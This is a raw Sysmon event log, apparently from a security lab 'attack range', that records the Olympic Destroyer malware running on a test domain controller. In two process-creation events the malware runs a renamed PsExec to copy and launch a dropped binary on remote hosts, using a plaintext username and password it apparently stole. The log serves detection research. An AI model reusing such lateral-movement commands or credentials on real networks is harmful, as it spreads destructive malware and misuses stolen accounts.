10:57:13.701{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292630Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.685{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1309-6216-2206-000000003802}1188C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292629Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.685{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1309-6216-2206-000000003802}1188C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292628Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.654{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1309-6216-2106-000000003802}6748C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292627Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.638{C8EA50B7-12E6-6216-4B05-000000003802}67926936C:\Temp\olympic_destroyer.exe{C8EA50B7-1309-6216-2106-000000003802}6748C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292626Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.642{C8EA50B7-1309-6216-2106-000000003802}6748C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.252 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292625Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.638{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1309-6216-2106-000000003802}6748C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292624Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.638{C8EA50B7-1309-6216-1D06-000000003802}6400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292623Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.623{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1309-6216-1D06-000000003802}6400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292622Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.623{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1309-6216-1D06-000000003802}6400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292621Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.603{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292620Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:13.585{C8EA50B7-1309-6216-1D06-000000003802}6400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292619Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.554{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1309-6216-2006-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292618Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.538{C8EA50B7-12E6-6216-4B05-000000003802}67926924C:\Temp\olympic_destroyer.exe{C8EA50B7-1309-6216-2006-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292617Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.552{C8EA50B7-1309-6216-2006-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\239.255.255.250 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292616Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.538{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1309-6216-2006-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292615Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.538{C8EA50B7-1309-6216-1C06-000000003802}6276C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292614Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.538{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1309-6216-1F06-000000003802}6460C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292613Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.538{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1309-6216-1F06-000000003802}6460C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292612Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.523{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1309-6216-1C06-000000003802}6276C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292611Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.523{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1309-6216-1C06-000000003802}6276C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292610Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.523{C8EA50B7-1309-6216-1F06-000000003802}64605804C:\Windows\system32\conhost.exe{C8EA50B7-1309-6216-1D06-000000003802}6400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292609Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:13.523{C8EA50B7-1309-6216-1C06-000000003802}6276C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292608Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.501{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1309-6216-1F06-000000003802}6460C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292607Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.485{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1309-6216-1F06-000000003802}6460C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292606Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.470{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1309-6216-1E06-000000003802}6440C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292605Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.470{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1309-6216-1E06-000000003802}6440C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292604Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.438{C8EA50B7-1309-6216-1E06-000000003802}64406392C:\Windows\system32\conhost.exe{C8EA50B7-1309-6216-1C06-000000003802}6276C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292603Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.400{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1309-6216-1E06-000000003802}6440C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292602Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.385{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1309-6216-1E06-000000003802}6440C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292601Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.369{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1309-6216-1D06-000000003802}6400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292600Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.353{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292599Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.353{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292598Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.353{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292597Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:13.353{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 